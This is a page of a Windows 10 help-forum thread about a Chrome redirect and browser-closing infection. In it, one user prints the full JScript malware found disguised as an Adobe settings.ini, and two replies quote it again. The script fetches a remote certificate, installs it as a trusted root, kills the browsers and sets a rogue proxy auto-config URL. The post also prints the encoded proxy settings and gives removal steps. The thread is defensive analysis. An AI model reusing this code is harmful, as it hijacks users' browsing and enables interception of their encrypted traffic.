Page 4 of 12 FirstFirst ... 23456 ... LastLast

  1. Joined : Dec 2015
    Posts : 21
    10 64bit
       18 Dec 2015 #31

    simrick said: View Post
    Whoa! I have never, in all my years cleaning viruses off computers, seen an RKILL log like that!
    Has your computer been running slow at all? It appears as if your entire Windows OS is loaded with reparse junctions that point to nowhere.


    These are nothing - video files from ASUS



    This legitimate dll file has a reparse point to nowhere - that is suspicious, and why I ask if your computer was running slow. Zeroaccess is part of a botnet which either runs clickfraud or bitcoin mining.



    And the list goes on and on for reparse points-thousands of them. Honestly, I've never seen anything like this.



    You've got a major problem with your hosts file.



    I will tell you what I would do at this point: either do a clean install, completely formatting your hard drive, or post for help at Bleeping Computer, to see if they are able to sort things.
    The hosts file additions are mine. Those are all Adobe IPs that I am blocking

    The rest, I'm not sure why RKILL shows all those. The first time I ran Rkill it didn't have any of that. I did post on Bleepingcomputer but no one responded yet. Btw, no my computer runs as fast as ever, no issues at all. -- I just ran Rkill again and it didn't have all that stuff (see attachment). So strange... Just rebooted and ran Rkill again and it's still fine. Maybe it was a fluke?

    Thanks for the help
    Google redirection localhost.world Attached Files
      My System SpecsSystem Spec


  2. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       18 Dec 2015 #32

    mixolyd said: View Post
    The hosts file additions are mine. Those are all Adobe IPs that I am blocking
    Ah, that explains it - I did look up a couple and one said Adobe in CA, another said something in VA...

    mixolyd said: View Post
    The rest, I'm not sure why RKILL shows all those. The first time I ran Rkill it didn't have any of that. I did post on Bleepingcomputer but no one responded yet.
    Yes, be patient with them - they are inundated, but they are top-notch, and will work with someone until everything is completed - they never give up.

    mixolyd said: View Post
    Btw, no my computer runs as fast as ever, no issues at all.
    Great!

    mixolyd said: View Post
    -- I just ran Rkill again and it didn't have all that stuff (see attachment). So strange... Just rebooted and ran Rkill again and it's still fine. Maybe it was a fluke?

    Thanks for the help
    Could be - I know the "missing services" is.
    Your new RKILL log looks much better now.

    Your logs over at BC show:
    GroupPolicyScripts: Restriction <======= ATTENTION
    GroupPolicyScripts\User: Restriction <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION

    This might be the problem, unless you are specifically using Group Policy on your rig.

    EDIT: I would say, now that you've posted there, and have a starting point, I wouldn't do anything else to the computer until they give you some instruction.
      My System SpecsSystem Spec


  3. Joined : Dec 2015
    Posts : 21
    10 64bit
       18 Dec 2015 #33

    simrick said: View Post
    Ah, that explains it - I did look up a couple and one said Adobe in CA, another said something in VA...


    Yes, be patient with them - they are inundated, but they are top-notch, and will work with someone until everything is completed - they never give up.


    Great!


    Could be - I know the "missing services" is.
    Your new RKILL log looks much better now.

    Your logs over at BC show:
    GroupPolicyScripts: Restriction <======= ATTENTION
    GroupPolicyScripts\User: Restriction <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION

    This might be the problem, unless you are specifically using Group Policy on your rig.

    EDIT: I would say, now that you've posted there, and have a starting point, I wouldn't do anything else to the computer until they give you some instruction.
    Thanks for the help!
      My System SpecsSystem Spec


  4. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       18 Dec 2015 #34

    mixolyd said: View Post
    Thanks for the help!
    No problem - good luck and keep us posted here of how it goes!
      My System SpecsSystem Spec


  5. Joined : Dec 2015
    Posts : 21
    10 64bit
       21 Dec 2015 #35

    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now so I'm guessing it's gone
      My System SpecsSystem Spec


  6. Joined : Dec 2015
    Posts : 5
    Windows 8.1
       21 Dec 2015 #36

    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window that flashed happened always at 18:00, so searched in the task scheduler. Bingo:

    Click image for larger version. 

Name:	56011f2df029b4f4b417fec7d7f11bbf.png 
Views:	33 
Size:	10.2 KB 
ID:	54678
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, this are its contents:
    Code:
    var ns, no, re, rs, st, reg, pac;var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      if (reg != pac) {
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    ;
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make work that fake google through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by Fiddler free web debugging proxy
    , and that it shows on my installed certs as this:

    Click image for larger version. 

Name:	donottrust.png 
Views:	16 
Size:	4.7 KB 
ID:	54680
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one, localhost.world from where that smelly proxy settings are pulled from, and mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is but it involves more domains. What is clear is that this is obviously malware, probably an attemp of phising. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.

    Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.
      My System SpecsSystem Spec


  7. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #37

    mixolyd said: View Post
    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now so I'm guessing it's gone
    Glad to hear it!
      My System SpecsSystem Spec


  8. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #38

    moraleja39 said: View Post
    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window that flashed happened always at 18:00, so searched in the task scheduler. Bingo:

    Click image for larger version. 

Name:	56011f2df029b4f4b417fec7d7f11bbf.png 
Views:	33 
Size:	10.2 KB 
ID:	54678
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, this are its contents:
    Code:
    var ns, no, re, rs, st, reg, pac;var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      if (reg != pac) {
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    ;
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make work that fake google through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by Fiddler free web debugging proxy
    , and that it shows on my installed certs as this:

    Click image for larger version. 

Name:	donottrust.png 
Views:	16 
Size:	4.7 KB 
ID:	54680
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one, localhost.world from where that smelly proxy settings are pulled from, and mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is but it involves more domains. What is clear is that this is obviously malware, probably an attemp of phising. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.

    Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.
    Wow! That's some detective work!
      My System SpecsSystem Spec


  9. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #39

    mixolyd said: View Post
    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now so I'm guessing it's gone
    So, are you going to ask him if he thinks you really had a Zeroaccess infection?
      My System SpecsSystem Spec


  10. Joined : Dec 2015
    Posts : 21
    10 64bit
       21 Dec 2015 #40

    moraleja39 said: View Post
    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window that flashed happened always at 18:00, so searched in the task scheduler. Bingo:

    Click image for larger version. 

Name:	56011f2df029b4f4b417fec7d7f11bbf.png 
Views:	33 
Size:	10.2 KB 
ID:	54678
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, this are its contents:
    Code:
    var ns, no, re, rs, st, reg, pac;var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      if (reg != pac) {
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    ;
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make work that fake google through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by Fiddler free web debugging proxy
    , and that it shows on my installed certs as this:

    Click image for larger version. 

Name:	donottrust.png 
Views:	16 
Size:	4.7 KB 
ID:	54680
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one, localhost.world from where that smelly proxy settings are pulled from, and mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is but it involves more domains. What is clear is that this is obviously malware, probably an attemp of phising. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.

    Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.
    Nevermind my issue was not resolved. Thanks so much for posting this. Looks like I have the same task in my Task Scheduler.
      My System SpecsSystem Spec


 
Page 4 of 12 FirstFirst ... 23456 ... LastLast


Similar Threads
Thread Forum
Solved Edge browser can't access LOCALHOST type of IP addresses (build 10122
Hi there same problem with EDGE (the new browser) - can't access localhost type of addresses. I use several media servers with Web interface for controls etc. Get around - use loopback adapter -- but why should I -- Chrome / FF / IE all work...
Browsers and Email
Solved Dont forget EDGE CAN access Localhost type IP addresses now
Hi there Edge has been modified so you CAN set it to access local host type of sites (at least in build 10240). This was mentioned a while ago but just as a reminder -- many people have servers etc that have a web interface with a localhost or...
Installation and Setup
Why is Edge only offering google.fr as an option, not google.co.uk?
Hi, I've just installed windows 10 which all seems to have gone very well. The only problem I can't currently fix is that google seems to think I am in France! When I go to Edge/Settings/Advanced settings/search in the address bar with the only...
Browsers and Email
Windows 10 Hyper-V stop work | fail to connect do localhost
:sick: Hi, since yesterday my Hyper-V stoped work. I have no clue of whats going on. I tried to uninstall and install it again, but didn't work. Does someone knows how to purge hyper-v configuration when remove/uninstall it? Because it seems...
Virtualization
Loopback/localhost acces in apps
This is aimed at Win 8, but should be the same for 10 As some of us have found out, modern apps such as Edge are not allowed to send network traffic to the local host, so things like media servers and routers do not work I have just been...
Software and Apps
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd

All times are GMT -5. The time now is 16:24.
Find Us
Twitter Facebook Google+



Windows 10 Forums